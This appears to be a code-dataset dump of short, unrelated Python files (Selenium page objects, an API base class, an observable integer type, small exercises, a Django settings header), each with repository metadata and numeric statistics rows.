| 45.416667 | 108 | 0.73578 | 60 | 545 | 6.533333 | 0.75 | 0.061224 | 0.117347 | 0.173469 | 0.255102 | 0.255102 | 0.255102 | 0 | 0 | 0 | 0 | 0.07839 | 0.133945 | 545 | 11 | 109 | 49.545455 | 0.752119 | 0.183486 | 0 | 0 | 0 | 0.125 | 0.542141 | 0.53303 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
563500829c4d069d25d29e122217af76c93ab51d | 174 | py | Python | api/Note_test.py | gracejiang/note-sharing | 3785ab4f3f6f805e8cd0f6556c2b0faf6ed6d8da | [
"MIT"
] | null | null | null | api/Note_test.py | gracejiang/note-sharing | 3785ab4f3f6f805e8cd0f6556c2b0faf6ed6d8da | [
"MIT"
] | null | null | null | api/Note_test.py | gracejiang/note-sharing | 3785ab4f3f6f805e8cd0f6556c2b0faf6ed6d8da | [
"MIT"
] | 1 | 2021-03-02T12:34:11.000Z | 2021-03-02T12:34:11.000Z | import json
from Note import Note
n = Note("Friction", "introduction to friction", "UC Berkeley", 0, True, False, False, "https://google.com", 'lec.pdf')
print(n.toJSON())
| 24.857143 | 119 | 0.689655 | 26 | 174 | 4.615385 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006623 | 0.132184 | 174 | 6 | 120 | 29 | 0.788079 | 0 | 0 | 0 | 0 | 0 | 0.390805 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
56521af6f787122a9235b0899f31bb8d50512114 | 376 | py | Python | catalearn/__init__.py | Catalearn/Catalearn | 01587241bf9b6809975a560e654d3ef3a47965e8 | [
"MIT"
] | null | null | null | catalearn/__init__.py | Catalearn/Catalearn | 01587241bf9b6809975a560e654d3ef3a47965e8 | [
"MIT"
] | null | null | null | catalearn/__init__.py | Catalearn/Catalearn | 01587241bf9b6809975a560e654d3ef3a47965e8 | [
"MIT"
] | null | null | null | import sys
import warnings
from .upgrade import isLatestVersion
sys.setrecursionlimit(50000)
warnings.filterwarnings('ignore')
# if not isLatestVersion():
# print('This version of catalearn is no longer compatible with the backend')
# print('Please use \'pip3 install -U catalearn\' to upgrade to the latest version')
# sys.exit()
from .catalearn import *
| 19.789474 | 88 | 0.736702 | 47 | 376 | 5.893617 | 0.680851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019293 | 0.172872 | 376 | 18 | 89 | 20.888889 | 0.871383 | 0.550532 | 0 | 0 | 0 | 0 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
567dc74cca5ce962c42e1ff80a6d92dca8715b6b | 209 | py | Python | py3rijndael/__init__.py | squaresmile/py3rijndael | 569fe2a4b2ab5ccb4768e2fabcd0fa398e3c97fc | [
"MIT"
] | null | null | null | py3rijndael/__init__.py | squaresmile/py3rijndael | 569fe2a4b2ab5ccb4768e2fabcd0fa398e3c97fc | [
"MIT"
] | null | null | null | py3rijndael/__init__.py | squaresmile/py3rijndael | 569fe2a4b2ab5ccb4768e2fabcd0fa398e3c97fc | [
"MIT"
] | null | null | null | from py3rijndael.paddings import Pkcs7Padding, ZeroPadding
from py3rijndael.rijndael import Rijndael, RijndaelCbc
__version__ = "0.3.5"
__all__ = ["Pkcs7Padding", "ZeroPadding", "Rijndael", "RijndaelCbc"]
| 23.222222 | 68 | 0.779904 | 21 | 209 | 7.380952 | 0.619048 | 0.193548 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037634 | 0.110048 | 209 | 8 | 69 | 26.125 | 0.795699 | 0 | 0 | 0 | 0 | 0 | 0.22488 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
3b066736be06ab5a0929e3d2af78da8ea95392b4 | 911 | py | Python | Ar_Script/unittest_demo/BBS/test_case/page_obj/base.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | null | null | null | Ar_Script/unittest_demo/BBS/test_case/page_obj/base.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | 1 | 2020-01-19T01:19:57.000Z | 2020-01-19T01:19:57.000Z | Ar_Script/unittest_demo/BBS/test_case/page_obj/base.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | null | null | null | class Page(object):
'''
Base page class, inherited by all pages.
Initialisation: URL, driver, timeout
Open-page method
Find a single element
Find multiple elements
Check that the page opened
Execute JavaScript code
'''
bbs_url='https://mail.qq.com'
def __init__(self,selenium_driver,base_url=bbs_url,parent=None):
self.base_url=base_url
self.timeout=30
self.driver=selenium_driver
self.parent=parent
def _open(self,url):
self.url=self.base_url+url
self.driver.get(self.url)
assert self.on_page(), 'Failed to open [%s]' % self.url
def open(self):
return self._open(self.url)
def on_page(self):
print(self.driver.current_url)
return self.driver.current_url==(self.url)
def find_element(self,*loc):
return self.driver.find_element(*loc)
def find_elments(self,*loc):
return self.driver.find_elements(*loc)  # was a self-call, which recursed forever
def script(self,src):
return self.driver.execute_script(src) | 23.358974 | 68 | 0.628979 | 124 | 911 | 4.435484 | 0.370968 | 0.109091 | 0.054545 | 0.072727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002933 | 0.251372 | 911 | 39 | 69 | 23.358974 | 0.803519 | 0.084523 | 0 | 0 | 0 | 0 | 0.034134 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 1 | 0.318182 | false | 0 | 0 | 0.181818 | 0.636364 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
3b0e3a300cfd5fa0db71dc9dbdded0e8a717dc33 | 168 | py | Python | ephys_anonymizer/__init__.py | alexrockhill/video_anonymize | e3d672f46f48a21e2320c9815f9769902bbe943d | [
"BSD-3-Clause"
] | null | null | null | ephys_anonymizer/__init__.py | alexrockhill/video_anonymize | e3d672f46f48a21e2320c9815f9769902bbe943d | [
"BSD-3-Clause"
] | null | null | null | ephys_anonymizer/__init__.py | alexrockhill/video_anonymize | e3d672f46f48a21e2320c9815f9769902bbe943d | [
"BSD-3-Clause"
] | null | null | null | """A anonymization toolbox for video and neuroimaging files."""
__version__ = '0.1.5'
from ephys_anonymizer.anonymizer import video_anonymize, raw_anonymize # noqa
| 24 | 78 | 0.779762 | 22 | 168 | 5.636364 | 0.863636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020548 | 0.130952 | 168 | 6 | 79 | 28 | 0.828767 | 0.375 | 0 | 0 | 0 | 0 | 0.050505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
3b641a0c2766ce37091f0a6b3166ad667f6adaa2 | 2,209 | py | Python | pyrez/api/APIBase.py | pytheous/Pyrez | 85f6f27359288b5f0ad70ff543f247843ac326f9 | [
"MIT"
] | null | null | null | pyrez/api/APIBase.py | pytheous/Pyrez | 85f6f27359288b5f0ad70ff543f247843ac326f9 | [
"MIT"
] | null | null | null | pyrez/api/APIBase.py | pytheous/Pyrez | 85f6f27359288b5f0ad70ff543f247843ac326f9 | [
"MIT"
] | null | null | null |
from ..exceptions.ServiceUnavailable import ServiceUnavailable
from ..logging import create_logger
from ..utils.http import http_request
class APIBase:
#Do not instantiate this object directly; instead, use::
"""Provide a base class for easier requests. DON'T INITIALISE THIS YOURSELF!
Attributes
----------
headers : class:`dict`
cookies : class:`dict`
Keyword arguments
-----------------
headers : class:`dict`
cookies : class:`dict`
Methods
-------
__init__(headers=None, cookies=None, loggerName=None, debug_mode=True)
_encode(string, encodeType="utf-8")
_httpRequest(url, headers=None)
"""
def __init__(self, headers=None, cookies=None, loggerName=None, debug_mode=True):
self.debug_mode = debug_mode
if self.debug_mode:
self.logger = create_logger(loggerName or self.__class__.__name__)
def __enter__(self):
"""Enable context management usage: `with APIBase() as api_base`"""
return self
def __exit__(self, *args):
"""Clean up."""
pass
@classmethod
def _encode(cls, string, encodeType="utf-8"):
"""
Parameters
----------
string [str]:
encodeType [str]:
Returns
-------
str
String encoded to format type
"""
return str(string).encode(encodeType)
def _httpRequest(self, url, method='GET', raise_for_status=True, params=None, headers=None, json=None, *args, **kwargs):
"""Make a synchronous HTTP request with the `requests` library.
Parameters
----------
url : str
URL of the resource
method : |STR|
HTTP method to be used by the request
headers : |DICT|
Custom headers
"""
r, t = http_request(url, method=method, params=params, headers=headers, json=json, *args, **kwargs)
if raise_for_status:
if hasattr(r, 'status_code') and r.status_code == 503 or 'The API is unavailable' in r.text:
raise ServiceUnavailable(r.text)
r.raise_for_status()
return t
def close(self):
"""Properly close the underlying HTTP session"""
pass
| 30.680556 | 124 | 0.593481 | 248 | 2,209 | 5.104839 | 0.447581 | 0.028436 | 0.033175 | 0.036335 | 0.050553 | 0.050553 | 0 | 0 | 0 | 0 | 0 | 0.003161 | 0.283839 | 2,209 | 71 | 125 | 31.112676 | 0.797092 | 0.375736 | 0 | 0.083333 | 0 | 0 | 0.035902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.083333 | 0.125 | 0 | 0.541667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
3b760115ef07c1475153b48cd74f10e8e8b417e7 | 6,096 | py | Python | observables/integer.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | 1 | 2018-01-11T14:01:05.000Z | 2018-01-11T14:01:05.000Z | observables/integer.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | null | null | null | observables/integer.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | null | null | null | from typing import Callable, SupportsInt, SupportsFloat, SupportsRound, SupportsComplex, SupportsAbs, SupportsBytes
from observable_primitives.observables.numeric_base import ObservableNumeric
class ObservableInteger(ObservableNumeric, SupportsInt, SupportsFloat, SupportsRound, SupportsComplex, SupportsAbs,
SupportsBytes):
def __init__(self, val=0, final_value=None, incorrect_type_handler="round"):
"""
An integer which is observable.
All methods and operations that work on integer should work on this class and have identical behavior.
The only exception are the augmented arithmetic assignments, these all call the observers:
+=, -=, *=, /=, //=, %=, **=, <<=, >>=, &=, ^=, |=
:param val: Anything that can be cast to an int.
:param str | Callable incorrect_type_handler: policy for coercing a non-int result, e.g. "round" or "int"
"""
super().__init__(val=int(val))
self._incorrect_type_policy = incorrect_type_handler
self.final_value = final_value
# Unary
def __index__(self): # For indexing in list etc.
return self._val
def __invert__(self):
return ~self._val
# Arithmetics
def __pow__(self, power, modulo=None):
return pow(self._val, power, modulo)
def __rpow__(self, power, modulo=None):
return pow(power, self._val, modulo)
# Arithmetics: Divisions and Modulo
def __floordiv__(self, other):
return self._val // other
def __rfloordiv__(self, other):
return other // self._val
def __mod__(self, other):
return self._val % other
def __rmod__(self, other):
return other % self._val
def __divmod__(self, other):
return divmod(self._val, other)
def __rdivmod__(self, other):
return divmod(other, self._val)
# Arithmetics: Binary
def __lshift__(self, other):
return self._val << other
def __rlshift__(self, other):
return other << self._val
def __rshift__(self, other):
return self._val >> other
def __rrshift__(self, other):
return other >> self._val
# Boolean
def __and__(self, other):
return self._val & other
def __rand__(self, other):
return other & self._val
def __or__(self, other):
return self._val | other
def __ror__(self, other):
return other | self._val
def __xor__(self, other):
return self._val ^ other
def __rxor__(self, other):
return other ^ self._val
# Representation
def __bytes__(self) -> bytes:
return bytes(self._val)
# Conversions
def __complex__(self) -> complex:
return complex(self._val)
def __int__(self) -> int:
return int(self._val)
def __float__(self) -> float:
return float(self._val)
    def __round__(self, n=None) -> int:
return round(self._val, n)
# Augmented arithmetics
def __ilshift__(self, other):
previous = self._val
self._val <<= other
return self._ireturn(method="__ilshift__", other=other, previous=previous)
def __irshift__(self, other):
previous = self._val
self._val >>= other
return self._ireturn(method="__irshift__", other=other, previous=previous)
def __iand__(self, other):
previous = self._val
self._val &= other
return self._ireturn(method="__iand__", other=other, previous=previous)
def __ixor__(self, other):
previous = self._val
self._val ^= other
return self._ireturn(method="__ixor__", other=other, previous=previous)
def __ior__(self, other):
previous = self._val
self._val |= other
return self._ireturn(method="__ior__", other=other, previous=previous)
def __imod__(self, other):
previous = self._val
self._val %= other
return self._ireturn(method="__imod__", other=other, previous=previous)
def __ipow__(self, other, modulo=None):
previous = self._val
self._val = pow(self._val, other, modulo)
return self._ireturn(method="__ipow__", other=other, modulo=modulo, previous=previous)
# Observation method
def _ireturn(self, *, method, other, **kwargs):
# Check if incorrect type
if not isinstance(self._val, int):
name = type(self).__name__
# String keyword policies
if isinstance(self._incorrect_type_policy, str):
if self._incorrect_type_policy.lower() == "round":
self._val = round(self._val)
elif self._incorrect_type_policy.lower() == "int":
self._val = int(self._val)
else:
raise ValueError(f"Value of {name} is not an integer. Instead it is {type(self._val)}.")
# Check for callable policy
elif isinstance(self._incorrect_type_policy, Callable):
self._val = self._incorrect_type_policy(self._val)
# Raise error
else:
raise ValueError(f"Value of {name} is not an integer. Instead it is {type(self._val)}.")
# Notify observers
self.update_observers(method=method, other=other, new_val=self._val, **kwargs)
return self
# Class specifics
@property
def imag(self):
return 0
@property
def real(self):
return self._val
def conjugate(self):
return complex(self._val, 0)
def bit_length(self):
return self._val.bit_length()
def from_bytes(self, bytes, byteorder, *, signed):
return self._val.from_bytes(bytes=bytes, byteorder=byteorder, signed=signed)
def to_bytes(self, length, byteorder, *, signed):
return self._val.to_bytes(length=length, byteorder=byteorder, signed=signed)
# Added specials
def range(self, *args):
if len(args) == 1:
self.final_value = args[0] - 1
else:
self.final_value = args[1] - 1
for i in range(*args):
yield self.set(i, method="range")
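The augmented assignments above all route through `_ireturn`, which notifies observers after mutating the value. A minimal self-contained sketch of that notify-on-mutate pattern (`MiniObservableInt` and its `subscribe` method are illustrative stand-ins, not the real `ObservableNumeric` API):

```python
class MiniObservableInt:
    def __init__(self, val=0):
        self._val = int(val)
        self._observers = []

    def subscribe(self, fn):
        self._observers.append(fn)

    def __iadd__(self, other):
        # Mutate first, then notify every observer with old and new value
        previous = self._val
        self._val += other
        for fn in self._observers:
            fn(method="__iadd__", previous=previous, new_val=self._val)
        return self


events = []
x = MiniObservableInt(1)
x.subscribe(lambda **kw: events.append(kw))
x += 4
assert x._val == 5
assert events[0]["previous"] == 1 and events[0]["new_val"] == 5
```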
| 29.592233 | 115 | 0.621391 | 704 | 6,096 | 4.997159 | 0.221591 | 0.111427 | 0.068221 | 0.03411 | 0.436612 | 0.31552 | 0.241046 | 0.138715 | 0.138715 | 0.138715 | 0 | 0.001811 | 0.275262 | 6,096 | 205 | 116 | 29.736585 | 0.794477 | 0.112205 | 0 | 0.130081 | 0 | 0 | 0.039947 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.01626 | 0.252033 | 0.674797 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
3b87d0d0e1f347b21acbab96ded62520b7e2bd04 | 54 | py | Python | credentials.py | BAHETIHARSH/automate-linkedin | 99af94bf0894b2901d9f9a54ba2a440c69dcfc64 | [
"MIT"
] | null | null | null | credentials.py | BAHETIHARSH/automate-linkedin | 99af94bf0894b2901d9f9a54ba2a440c69dcfc64 | [
"MIT"
] | null | null | null | credentials.py | BAHETIHARSH/automate-linkedin | 99af94bf0894b2901d9f9a54ba2a440c69dcfc64 | [
"MIT"
] | null | null | null | loginid = "your login id"
password = "your password" | 27 | 27 | 0.703704 | 7 | 54 | 5.428571 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185185 | 54 | 2 | 28 | 27 | 0.863636 | 0 | 0 | 0 | 0 | 0 | 0.481481 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.5 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
3b8ebfe0b1ca313f1d2207256efed0dbd4039431 | 38 | py | Python | chocopy-rs/test/original/pa2/expr_var_assign.py | wwylele/chocopy-wwylele | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | 7 | 2021-08-28T18:20:45.000Z | 2022-02-01T07:35:59.000Z | chocopy-rs/test/original/pa2/expr_var_assign.py | wwylele/chocopy-wwylele | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | 5 | 2020-03-04T23:49:17.000Z | 2021-12-09T21:42:55.000Z | tests/typecheck/expr_var_assign.py | yangdanny97/chocopy-python-frontend | d0fb63fc744771640fa4d06076743f42089899c1 | [
"MIT"
] | 3 | 2019-11-07T23:54:49.000Z | 2021-06-21T20:45:54.000Z | x:int = 1
o:object = None
x = o = 42
| 7.6 | 15 | 0.526316 | 9 | 38 | 2.222222 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 0.315789 | 38 | 4 | 16 | 9.5 | 0.653846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
3b91e4b5aa6dd4f1b05b89a6f707cb59981bdd7e | 68 | py | Python | 2 semester/PW/Coursera/Python/1 Week/11.py | kurpenok/Labs | 069c92b7964a1445d093313b38ebdc56318d2a73 | [
"MIT"
] | 1 | 2022-02-06T17:50:25.000Z | 2022-02-06T17:50:25.000Z | 2 semester/PW/Coursera/Python/1 Week/11.py | kurpenok/Labs | 069c92b7964a1445d093313b38ebdc56318d2a73 | [
"MIT"
] | null | null | null | 2 semester/PW/Coursera/Python/1 Week/11.py | kurpenok/Labs | 069c92b7964a1445d093313b38ebdc56318d2a73 | [
"MIT"
] | 1 | 2022-03-02T06:45:06.000Z | 2022-03-02T06:45:06.000Z | m = int(input())
m = m % 1440
a = m // 60
b = m % 60
print(a, b)
| 7.555556 | 16 | 0.441176 | 15 | 68 | 2 | 0.533333 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 0.338235 | 68 | 8 | 17 | 8.5 | 0.488889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
3b979b8b27ffcfe9bd6784d35e976ab788514c6d | 146 | py | Python | src/examples/minimal.py | apatrushev/aioflows | 2e8fb3d84c0b177931bb92f9693349985c83fe37 | [
"MIT"
] | 2 | 2020-11-22T13:51:34.000Z | 2020-11-24T20:18:15.000Z | src/examples/minimal.py | apatrushev/aioflows | 2e8fb3d84c0b177931bb92f9693349985c83fe37 | [
"MIT"
] | null | null | null | src/examples/minimal.py | apatrushev/aioflows | 2e8fb3d84c0b177931bb92f9693349985c83fe37 | [
"MIT"
] | null | null | null | import asyncio
from aioflows.simple import Printer, Ticker
async def start():
await (Ticker() >> Printer()).start()
asyncio.run(start())
| 13.272727 | 43 | 0.691781 | 18 | 146 | 5.611111 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 146 | 10 | 44 | 14.6 | 0.827869 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
3b9d427a5ce89470aa288f0a8a1dd15c162dccb4 | 190 | py | Python | src/zeit/ldap/generation/__init__.py | ZeitOnline/zeit.ldap | 42dbf372d8108a011b3d112126e3769a130e52e7 | [
"BSD-3-Clause"
] | null | null | null | src/zeit/ldap/generation/__init__.py | ZeitOnline/zeit.ldap | 42dbf372d8108a011b3d112126e3769a130e52e7 | [
"BSD-3-Clause"
] | 1 | 2017-07-14T09:52:30.000Z | 2017-07-14T09:52:30.000Z | src/zeit/ldap/generation/__init__.py | ZeitOnline/zeit.ldap | 42dbf372d8108a011b3d112126e3769a130e52e7 | [
"BSD-3-Clause"
] | null | null | null | import zope.generations.generations
minimum_generation = 3
generation = 3
manager = zope.generations.generations.SchemaManager(
minimum_generation, generation, "zeit.ldap.generation")
| 23.75 | 59 | 0.810526 | 20 | 190 | 7.6 | 0.5 | 0.197368 | 0.342105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011765 | 0.105263 | 190 | 7 | 60 | 27.142857 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
3b9f8d121dded93a938e61065a3bf850418949f4 | 79 | py | Python | mmpose/models/necks/__init__.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 367 | 2022-01-14T03:32:25.000Z | 2022-03-31T04:48:20.000Z | mmpose/models/necks/__init__.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 27 | 2022-01-27T07:12:49.000Z | 2022-03-31T04:31:13.000Z | mmpose/models/necks/__init__.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 53 | 2022-01-18T11:21:43.000Z | 2022-03-31T06:42:41.000Z | from .gap_neck import GlobalAveragePooling
__all__ = ['GlobalAveragePooling']
| 19.75 | 42 | 0.822785 | 7 | 79 | 8.571429 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101266 | 79 | 3 | 43 | 26.333333 | 0.84507 | 0 | 0 | 0 | 0 | 0 | 0.253165 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8e560ea211629f88d2305a2cde17e367e5845602 | 785 | py | Python | util.py | davidar/polya | b796e38f39c8d5d82db67275423127d774fde171 | [
"MIT"
] | 6 | 2015-09-10T14:35:03.000Z | 2021-01-16T09:32:00.000Z | util.py | davidar/polya | b796e38f39c8d5d82db67275423127d774fde171 | [
"MIT"
] | null | null | null | util.py | davidar/polya | b796e38f39c8d5d82db67275423127d774fde171 | [
"MIT"
] | 1 | 2017-09-13T19:10:35.000Z | 2017-09-13T19:10:35.000Z | import operator
def prod(xs):
return reduce(operator.mul, xs, 1)
class DynEnum(object):
def __init__(self):
self.ident = {} # str -> int
self.names = [] # int -> str
def __call__(self, name):
if name in self.ident:
return self.ident[name]
else:
i = len(self)
self.ident[name] = i
self.names.append(name)
return i
def __getitem__(self, i):
return self.names[i]
def __contains__(self, name):
return name in self.ident
def __len__(self):
return len(self.names)
class DynDict(dict):
def __init__(self, f):
dict.__init__(self)
self.f = f
def __missing__(self, key):
val = self[key] = self.f(key)
return val
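`DynDict` is a memoizing dict: `__missing__` computes a value on first access and caches it. A runnable sketch (the class is restated so the demo is self-contained):

```python
class DynDict(dict):
    """dict that computes missing values with f and caches them."""
    def __init__(self, f):
        dict.__init__(self)
        self.f = f

    def __missing__(self, key):
        # Compute, store, and return in one step
        val = self[key] = self.f(key)
        return val


squares = DynDict(lambda k: k * k)
assert squares[4] == 16   # computed on first access
assert 4 in squares       # and cached afterwards
```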
| 24.53125 | 38 | 0.550318 | 101 | 785 | 3.960396 | 0.336634 | 0.1125 | 0.055 | 0.075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001916 | 0.335032 | 785 | 31 | 39 | 25.322581 | 0.764368 | 0.026752 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.035714 | 0.142857 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
8e5a77b0b67c023d2789aba656c385ac5032dd71 | 5,104 | py | Python | backend/infs3202/settings/base.py | eivrei/INFS3202 | e5b2aa29768a75475f4be3a31d824de842c8b1e9 | [
"MIT"
] | null | null | null | backend/infs3202/settings/base.py | eivrei/INFS3202 | e5b2aa29768a75475f4be3a31d824de842c8b1e9 | [
"MIT"
] | 9 | 2020-02-12T00:03:08.000Z | 2022-02-10T07:52:04.000Z | backend/infs3202/settings/base.py | eivrei/INFS3202 | e5b2aa29768a75475f4be3a31d824de842c8b1e9 | [
"MIT"
] | null | null | null | """
Django settings for infs3202 project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
from datetime import timedelta
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
